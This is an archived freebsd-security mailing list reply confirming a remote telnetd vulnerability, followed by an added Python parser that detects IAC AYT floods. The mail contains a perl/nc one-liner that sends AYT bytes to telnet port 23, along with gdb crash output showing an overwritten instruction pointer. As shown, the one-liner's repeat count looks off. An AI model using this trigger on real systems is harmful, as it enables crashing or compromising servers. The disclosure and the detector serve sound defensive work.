From owner-freebsd-security Thu Jul 19 2: 7:32 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost.freebsd.lublin.pl (mailhost.freebsd.lublin.pl [212.182.115.12])
	by hub.freebsd.org (Postfix) with ESMTP id E61D637B403
	for ; Thu, 19 Jul 2001 02:07:15 -0700 (PDT)
	(envelope-from venglin@freebsd.lublin.pl)
Received: from clitoris (root@mailhost.freebsd.lublin.pl [212.182.115.12])
	by mailhost.freebsd.lublin.pl (8.11.4/8.11.4) with SMTP id f6J95om09102;
	Thu, 19 Jul 2001 11:05:50 +0200 (CEST)
	(envelope-from venglin@freebsd.lublin.pl)
Message-ID: <014d01c11031$bdab5a10$2001a8c0@clitoris>
From: "Przemyslaw Frasunek"
To: "Mike Tancsa"
Cc:
References: <5.1.0.14.0.20010719001357.03e22638@192.168.0.12>
Subject: Re: FreeBSD remote root exploit ?
Date: Thu, 19 Jul 2001 11:03:53 +0200
Organization: babcia padlina ltd.
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

> Posted to bugtraq is a notice about telnetd being remotely root
> exploitable. Does anyone know if it is true ?

Yes, telnetd is vulnerable.

lagoon:venglin:~> perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c x0 . "\r\n"' | nc localhost 23

(gdb) att 9024
Attaching to process 9024
0x28230f90 in ?? ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x5d736559 in ?? ()
(gdb) bt
#0  0x5d736559 in ?? ()
#1  0x804e9d9 in ?? ()
#2  0x804d1a1 in ?? ()
#3  0x804d6d1 in ?? ()
#4  0x804d14d in ?? ()
#5  0x8049bd3 in ?? ()

The strange %eip value is:

riget:root:/# perl -e 'printf("%c%c%c%c\n", 0x59, 0x65, 0x73, 0x5d)'
Yes]

"\r\n[Yes]\r\n" is response for IAC AYT command string.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
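The crash reported in the message above is driven by a long run of telnet IAC AYT (0xFF 0xF6) commands, each of which makes the server append "[Yes]" to its reply buffer. From a monitoring point of view the useful signal is therefore the AYT count in the client-to-server stream. The following is an added illustration, not code from the mail, from FreeBSD, or from the telnetd source: a small Python parser that walks a telnet byte stream, honours the IAC IAC escape and SB ... IAC SE subnegotiation blocks so that literal data is not miscounted, and flags a session whose AYT count exceeds a threshold. The threshold value and the two sample streams are constructed assumptions for illustration only.

```python
"""Tally telnet IAC commands in a client-to-server byte stream and flag AYT floods.

Added illustration for the thread above; not code from the original mail.
AYT_THRESHOLD is an assumed, constructed value, not a documented limit.
"""

# Telnet protocol constants (RFC 854 command codes).
IAC, SE, SB, WILL, WONT, DO, DONT, AYT = 255, 240, 250, 251, 252, 253, 254, 246
AYT_THRESHOLD = 64  # assumption: a legitimate session sends at most a handful of AYTs


def count_ayt(stream: bytes) -> dict:
    """Walk a telnet byte stream and tally IAC commands.

    Returns a dict with the number of AYT commands seen ("ayt"), the number
    of literal data bytes ("data"), and the total number of IAC commands
    parsed ("commands"). IAC IAC is an escaped 0xFF data byte,
    WILL/WONT/DO/DONT carry one option byte, and SB ... IAC SE encloses a
    subnegotiation whose contents are not counted as data.
    """
    i, n = 0, len(stream)
    ayt = data = commands = 0
    while i < n:
        b = stream[i]
        if b != IAC:
            data += 1
            i += 1
            continue
        if i + 1 >= n:          # dangling IAC at end of buffer: stop
            break
        cmd = stream[i + 1]
        if cmd == IAC:          # IAC IAC: escaped literal 0xFF byte
            data += 1
            i += 2
        elif cmd in (WILL, WONT, DO, DONT):
            commands += 1       # three-byte option negotiation
            i += 3
        elif cmd == SB:
            commands += 1       # skip to the terminating IAC SE
            end = stream.find(bytes([IAC, SE]), i + 2)
            i = n if end < 0 else end + 2
        else:
            commands += 1       # two-byte command (AYT, NOP, BRK, ...)
            if cmd == AYT:
                ayt += 1
            i += 2
    return {"ayt": ayt, "data": data, "commands": commands}


def is_ayt_flood(stream: bytes, threshold: int = AYT_THRESHOLD) -> bool:
    """True when the stream carries more AYT commands than the assumed threshold."""
    return count_ayt(stream)["ayt"] > threshold


# Constructed sample traffic (not captured data): one ordinary session and one
# that repeats IAC AYT thousands of times before the line terminator.
NORMAL_SESSION = bytes([IAC, DO, 1]) + b"login: " + bytes([IAC, AYT]) + b"\r\n"
FLOOD_SESSION = bytes([IAC, AYT]) * 5000 + b"\r\n"

if __name__ == "__main__":
    for name, s in (("normal", NORMAL_SESSION), ("flood", FLOOD_SESSION)):
        print(name, count_ayt(s), "FLOOD" if is_ayt_flood(s) else "ok")
```

The parser is deliberately stateless beyond the current position, so it can be run over a reassembled TCP payload from a packet capture or over a proxy's per-connection buffer; the only tuning knob is the threshold, which should be set from observed baseline traffic rather than the constructed value used here.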